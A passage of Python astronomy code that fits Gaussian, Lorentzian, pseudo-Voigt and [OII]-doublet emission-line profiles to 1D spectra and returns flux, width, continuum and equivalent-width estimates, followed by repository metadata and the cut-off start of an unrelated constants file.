a0=out[0][2]
a0_err=out[1][2][2]**0.5
continu=out[0][3]
continuErr=out[1][3][3]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
elif model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
elif out[1].__class__==n.ndarray and model=="pseudoVoigt" :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
if model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
if model=="pseudoVoigt" :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
#print "not enough space to fit the line"
if model=="gaussian" or model=="lorentz" :
return outPutNF,modNF,header
if model=="pseudoVoigt" :
return outPutNF_PV,modNF,headerPV
def fit_Line(self,wl,spec1d,err1d,a0,lineName="AL",fitWidth=20,DLC=20, p0_sigma=15.,p0_flux=8e-17,p0_share=0.5,continuumSide="left",model="gaussian"):
"""
fits a line profile to a spectrum around a fixed line position
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). a0 is not fitted, it is given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share of Gaussian and Lorentzian model. Only used if the line is fitted with a pseudoVoigt profile width (def: 0.5 no units)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt".
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
outPutNF_PV=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
if continuumSide=="left":
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0-DLC-fitWidth)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0 : self.gaussianLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux])
if model=="lorentz":
flMod=lambda aa,sigma,F0 : self.lorentzLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux])
if model=="pseudoVoigt":
flMod=lambda aa,sigma,F0,sh : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
p0=n.array([p0_sigma,p0_flux,p0_share])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray and ( model=="gaussian" or model=="lorentz") :
model1=flMod(wl[domainLine],out[0][0],out[0][1])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
elif model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
elif out[1].__class__==n.ndarray and model=="pseudoVoigt" :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
if model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
if model=="pseudoVoigt" :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
#print "not enough space to fit the line"
if model=="gaussian" or model=="lorentz" :
return outPutNF,modNF,header
if model=="pseudoVoigt" :
return outPutNF_PV,modNF,headerPV
elif continuumSide=="right" :
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0+fitWidth)&(wl<a0+DLC+fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0 : self.gaussianLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux])
if model=="lorentz":
flMod=lambda aa,sigma,F0 : self.lorentzLine(aa,sigma,F0,a0,continu)
p0=n.array([p0_sigma,p0_flux])
if model=="pseudoVoigt":
flMod=lambda aa,sigma,F0,sh : self.pseudoVoigtLine(aa,sigma,F0,a0,continu,sh)
p0=n.array([p0_sigma,p0_flux,p0_share])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray and ( model=="gaussian" or model=="lorentz") :
model1=flMod(wl[domainLine],out[0][0],out[0][1])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
elif model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
elif out[1].__class__==n.ndarray and model=="pseudoVoigt" :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
if model=="gaussian" or model=="lorentz" :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
if model=="pseudoVoigt" :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
#print "not enough space to fit the line"
if model=="gaussian" or model=="lorentz" :
return outPutNF,modNF,header
if model=="pseudoVoigt" :
return outPutNF_PV,modNF,headerPV
def fit_Line_OIIdoublet(self,wl,spec1d,err1d,a0=3726.0321735398957,lineName="OII",fitWidth=20,DLC=20,p0_sigma=4.,p0_flux=1e-16,p0_share=0.58,model="gaussian"):
"""
fits the [OII] doublet line profile
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). 2 positions given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share between the two [OII] lines. (def: 0.58)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt"
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0a "+lineName+"_a0b "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0[0], a0[1], self.dV,self.dV, self.dV,self.dV, self.dV, self.dV,self.dV, self.dV,self.dV, self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
domainLine=(wl>a0[0]-fitWidth)&(wl<a0[1]+fitWidth)
domainCont=(wl>a0[0]-DLC-fitWidth)&(wl<a0[0]-fitWidth)
if a0[0]<wl.max()-DLC and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,sh :continu+ self.gaussianLineNC(aa,sigma,(1-sh)*F0,a0[0])+self.gaussianLineNC(aa,sigma,sh*F0,a0[1])
if model=="lorentz":
flMod=lambda aa,sigma,F0,sh : self.lorentzLine(aa,sigma,(1-sh)*F0,a0[0],continu/2.)+self.lorentzLine(aa,sigma,sh*F0,a0[1],continu/2.)
index=n.searchsorted(wl,a0[1])
fd_a0_r=spec1d[index]
fd_a0_l=spec1d[index]
index=n.searchsorted(wl,a0[0])
if fd_a0_r>continu or fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=n.array([p0_sigma,p0_flux,p0_share]),sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
EW=flux/continu
outPut=n.array([a0[0],a0[1],flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0[0],a0[1],self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
return n.array([a0[0],a0[1],self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
def fit_Line_OIIdoublet_position(self,wl,spec1d,err1d,a0=3726.0321,lineName="O2_3728",fitWidth=20,DLC=20,p0_sigma=4.,p0_flux=1e-16,p0_share=0.58,model="gaussian"):
"""
fits the [OII] doublet line profile
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). 2 positions given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share between the two [OII] lines. (def: 0.58)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt"
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0a "+lineName+"_a0b "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, a0+2.782374, self.dV,self.dV, self.dV,self.dV, self.dV, self.dV,self.dV, self.dV,self.dV, self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
domainLine=(wl>a0-fitWidth)&(wl<a0+2.782374+fitWidth/2.)
domainCont=(wl>a0-fitWidth-DLC)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,sh,a0,continu :continu+ self.gaussianLineNC(aa,sigma,(1-sh)*F0,a0)+self.gaussianLineNC(aa,sigma,sh*F0,a0+2.782374)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
index=n.searchsorted(wl,a0+2.782374)
fd_a0_r=spec1d[index]
index=n.searchsorted(wl,a0)
fd_a0_l=spec1d[index]
if fd_a0_r>continu or fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu]),sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,a0+2.782374,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
def fit_Line_OIIdoublet_position_C0noise(self,wl,spec1d,err1d,a0=3726.0321,lineName="O2_3728",fitWidth=20,DLC=20,p0_sigma=4.,p0_flux=1e-16,p0_share=0.58,model="gaussian"):
"""
fits the [OII] doublet line profile
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted). 2 positions given.
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param p0_share: prior on the share between the two [OII] lines. (def: 0.58)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
:param model: line model to be fitted : "gaussian", "lorentz" or "pseudoVoigt"
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0a "+lineName+"_a0b "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, a0+2.782374, self.dV,self.dV, self.dV,self.dV, self.dV, self.dV,self.dV, self.dV,self.dV, self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
domainLine=(wl>a0-fitWidth)&(wl<a0+2.782374+fitWidth/2.)
domainCont=(wl>a0-fitWidth-DLC)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
if model=="gaussian":
flMod=lambda aa,sigma,F0,sh,a0,continu :continu+ self.gaussianLineNC(aa,sigma,(1-sh)*F0,a0)+self.gaussianLineNC(aa,sigma,sh*F0,a0+2.782374)
p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu])
index=n.searchsorted(wl,a0+2.782374)
fd_a0_r=spec1d[index]
index=n.searchsorted(wl,a0)
fd_a0_l=spec1d[index]
if fd_a0_r>continu or fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=n.array([p0_sigma,p0_flux,p0_share,a0,continu]),sigma=continu*n.ones_like(err1d[domainLine]),maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4])
var=continu*n.ones_like(err1d[domainLine])
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
share=out[0][2]
shareErr=out[1][2][2]**0.5
a0=out[0][3]
a0_err=out[1][3][3]**0.5
continu=out[0][4]
continuErr=out[1][4][4]**0.5
EW=flux/continu
outPut=n.array([a0,a0+2.782374,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,share,shareErr,fd_a0_l,fd_a0_r,chi2,ndof])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
return n.array([a0,a0+2.782374,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,self.dV,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
def fit_recLine(self,wl,spec1d,err1d,a0,lineName="AL",fitWidth=20,DLC=20,p0_sigma=5.,p0_flux=5e-17,continuumSide="left"):
"""
fits a recombination line profile : emission and absorption modeled by Gaussians. Only for high SNR spectra.
:param wl: wavelength (array, Angstrom)
:param spec1d: flux observed in the broad band (array, f lambda)
:param err1d: error on the flux observed in the broad band (array, f lambda)
:param a0: expected position of the peak of the line in the observed frame (redshifted)
:param lineName: suffix characterizing the line in the headers of the output
:param DLC: wavelength extent to fit the continuum around the line. (def: 230 Angstrom)
:param p0_sigma: prior on the line width in A (def: 15 A)
:param p0_flux: prior on the line flux in erg/cm2/s/A (def: 8e-17)
:param continuumSide: "left" = bluewards of the line or "right" = redwards of the line
Returns :
* array 1 with the parameters of the model
* array 2 with the model (wavelength, flux model)
* header corresponding to the array 1
"""
header=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
headerPV=" "+lineName+"_a0 "+lineName+"_flux "+lineName+"_fluxErr "+lineName+"_sigma "+lineName+"_sigmaErr "+lineName+"_continu "+lineName+"_continuErr "+lineName+"_EW "+lineName+"_share "+lineName+"_shareErr_"+" fd_a0_l "+lineName+"_fd_a0_r "+lineName+"_chi2 "+lineName+"_ndof"
outPutNF=n.array([a0, self.dV,self.dV,self.dV, self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV,self.dV])
modNF=n.array([self.dV,self.dV])
if continuumSide=="left":
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0-DLC)&(wl<a0-fitWidth)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
# model with absorption
flMod=lambda aa,sigma,F0,sigmaL,F0L,a0L,sigmaR,F0R,a0R : continu + self.gaussianLineNC(aa,sigma,F0,a0) - self.gaussianLineNC(aa,sigmaL,F0L,a0L) - self.gaussianLineNC(aa,sigmaR,F0R,a0R)
p0=n.array([p0_sigma,p0_flux,p0_sigma/2.,p0_flux/5.,a0-5, p0_sigma/2.,p0_flux/5.,a0-5])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4],out[0][5],out[0][6],out[0][7])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)-8
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
elif continuumSide=="right" :
domainLine=(wl>a0-fitWidth)&(wl<a0+fitWidth)
domainCont=(wl>a0+fitWidth)&(wl<a0+DLC)
if a0<wl.max()-DLC and a0>wl.min()+fitWidth and a0<wl.max()-fitWidth and len(domainLine.nonzero()[0])>2 and len(domainCont.nonzero()[0])>2 :
continu=n.median(spec1d[domainCont])
continuErr=n.median(err1d[domainCont])
# model with absorption
flMod=lambda aa,sigma,F0,sigmaL,F0L,a0L,sigmaR,F0R,a0R : continu + self.gaussianLineNC(aa,sigma,F0,a0) - self.gaussianLineNC(aa,sigmaL,F0L,a0L) - self.gaussianLineNC(aa,sigmaR,F0R,a0R)
p0=n.array([p0_sigma,p0_flux,p0_sigma/2.,p0_flux/5.,a0-5, p0_sigma/2.,p0_flux/5.,a0-5])
interp=interp1d(wl,spec1d)
fd_a0_r=interp(a0+0.2)
fd_a0_l=interp(a0-0.2)
if fd_a0_r>continu and fd_a0_l>continu :
out = curve_fit(flMod, wl[domainLine], spec1d[domainLine], p0=p0,sigma=err1d[domainLine],maxfev=1000000000, gtol=1.49012e-8)
if out[1].__class__==n.ndarray :
model1=flMod(wl[domainLine],out[0][0],out[0][1],out[0][2],out[0][3],out[0][4],out[0][5],out[0][6],out[0][7])
var=err1d[domainLine]
chi2=n.sum(abs(model1-spec1d[domainLine])**2./var**2.)
ndof=len(var)-8
sigma=out[0][0]
sigmaErr=out[1][0][0]**0.5
flux=out[0][1]
fluxErr=out[1][1][1]**0.5
EW=flux/continu
outPut=n.array([a0,flux,fluxErr,sigma,sigmaErr,continu,continuErr,EW,fd_a0_l,fd_a0_r,chi2,ndof ])
mod=n.array([wl[domainLine],model1])
return outPut,mod,header
else :
return n.array([a0,self.dV,self.dV,self.dV,self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV]),modNF,headerPV
else :
return n.array([a0,self.dV,self.dV,self.dV, self.dV,continu,continuErr,self.dV,fd_a0_l,fd_a0_r,self.dV,self.dV ]),modNF,header
else :
#print "not enough space to fit the line"
return outPutNF,modNF,header
| 52.876333 | 306 | 0.685834 | 8,439 | 49,598 | 3.939448 | 0.03946 | 0.074357 | 0.087532 | 0.105038 | 0.927989 | 0.92068 | 0.917401 | 0.908768 | 0.902361 | 0.899955 | 0 | 0.055642 | 0.143756 | 49,598 | 937 | 307 | 52.932764 | 0.727183 | 0.214424 | 0 | 0.874636 | 0 | 0 | 0.053564 | 0 | 0.001458 | 0 | 0 | 0 | 0 | 1 | 0.017493 | false | 0 | 0.010204 | 0 | 0.132653 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd9b5651af0708e77d058926863e115361da8ebc | 114 | py | Python | server/constants.py | nicoleachen8/HarvardOpenData.github.io | 7d9514161b42c3aedf3bd5ec1310e5bb7d35301c | [
"MIT"
] | null | null | null | server/constants.py | nicoleachen8/HarvardOpenData.github.io | 7d9514161b42c3aedf3bd5ec1310e5bb7d35301c | [
"MIT"
] | null | null | null | server/constants.py | nicoleachen8/HarvardOpenData.github.io | 7d9514161b42c3aedf3bd5ec1310e5bb7d35301c | [
"MIT"
] | 1 | 2021-03-27T15:15:34.000Z | 2021-03-27T15:15:34.000Z | def get_google_client_id():
